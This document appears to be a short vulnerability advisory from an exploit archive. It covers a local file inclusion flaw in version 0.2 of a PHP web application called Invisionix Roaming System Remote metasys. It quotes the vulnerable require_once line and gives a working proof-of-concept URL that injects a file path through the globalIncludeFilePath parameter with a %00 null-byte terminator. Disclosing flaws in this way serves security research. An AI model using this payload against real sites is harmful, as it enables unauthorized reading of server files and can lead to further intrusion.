34 lines
No EOL
1.3 KiB
Text
34 lines
No EOL
1.3 KiB
Text
nvisionix Roaming System Remote metasys 0.2 LFI Vulnerability
|
|
|
|
|
|
Site ................... : http://sourceforge.net/projects/irsr/
|
|
Download ............... : http://space.dl.sourceforge.net/project/irsr/irsr/irsr-0.2/irsr-0.2.ZIP
|
|
Author ................. : Treasure Priyamal
|
|
Contact ................ : treasure[at]treasuresec.com
|
|
|
|
Note : Successful exploitation requires that "register_globals" is enabled.
|
|
|
|
========================================================================
|
|
|
|
Description:
|
|
|
|
Your own portable PC system built by integrating existing Open Source components.
|
|
This mobile metasystem utilizes the internet's web hosting resources and is accessed
|
|
via any web browser enabled appliance from your home, work, school, library, cafes, etc
|
|
|
|
========================================================================
|
|
|
|
*************************************************
|
|
[!]This other sample vuln c0de which affected to LFI [!]
|
|
*************************************************
|
|
|
|
There is a vulnerability in almost every file directory , for example in this Directory file:
|
|
|
|
[-] system/default.php
|
|
|
|
require_once ($globalIncludeFilePath); // System's global include file.
|
|
|
|
-=[ P0C LFI ]=-
|
|
|
|
http://localhost/irsr/authenticate/sessions.php?globalIncludeFilePath=[LFI]%00
|
|
======================================================================== |